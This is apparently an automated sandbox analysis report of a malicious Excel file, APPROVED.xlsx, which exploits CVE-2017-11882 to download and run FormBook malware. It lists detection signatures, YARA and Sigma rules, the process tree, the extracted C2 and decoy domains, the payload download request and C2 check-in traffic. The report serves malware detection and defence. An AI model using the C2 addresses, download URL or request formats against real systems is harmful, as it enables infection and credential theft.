Loading ...

Play interactive tourEdit tour

Analysis Report APPROVED.xlsx

Overview

General Information

Sample Name:APPROVED.xlsx
Analysis ID:413096
MD5:09d492cf4937df0290af0be36ba30421
SHA1:4ad8665febc2f0524d0b23c8f94d947e1a563e14
SHA256:c0697b83e4d63f9a380466b91ba7db94e823b7a2fd137811bfcce5796a9b82f6
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2136 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3064 cmdline: 'C:\Users\Public\vbc.exe' MD5: 92BD99870C4E2829F3E6D1B3B512067D)
      • vbc.exe (PID: 2468 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)
      • vbc.exe (PID: 2876 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)
      • vbc.exe (PID: 2228 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)
      • vbc.exe (PID: 2236 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autofmt.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)
        • explorer.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • cmd.exe (PID: 2028 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        8.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 3.36.53.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3064
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3064

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: APPROVED.xlsxReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: 8.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, explorer.exe
          Source: Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.hfjxhs.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.zmzcrossrt.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 May 2021 06:29:20 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 13 May 2021 06:24:23 GMTETag: "1bf800-5c2302daaa325"Accept-Ranges: bytesContent-Length: 1832960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d c5 9c 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 1b 00 00 10 00 00 00 00 00 00 92 05 1c 00 00 20 00 00 00 20 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 05 1c 00 4f 00 00 00 00 20 1c 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1c 00 0c 00 00 00 08 04 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 e5 1b 00 00 20 00 00 00 e6 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0c 00 00 00 20 1c 00 00 0e 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1c 00 00 02 00 00 00 f6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 05 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 54 6d 04 00 34 8e 03 00 03 00 00 00 01 00 00 06 88 fb 07 00 80 08 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 08 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 21 07 00 06 28 34 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 1a 07 00 06 28 35 00 00 0a 00 2a 26 00 02 28 36 00 00 0a 00 2a ce 73 37 00 00 0a 80 01 00 00 04 73 38 00 00 0a 80 02 00 00 04 73 39 00 00 0a 80 03 00 00 04 73 3a 00 00 0a 80 04 00 00 04 73 3b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.21.65.7 104.21.65.7
          Source: Joe Sandbox ViewIP Address: 54.85.86.211 54.85.86.211
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
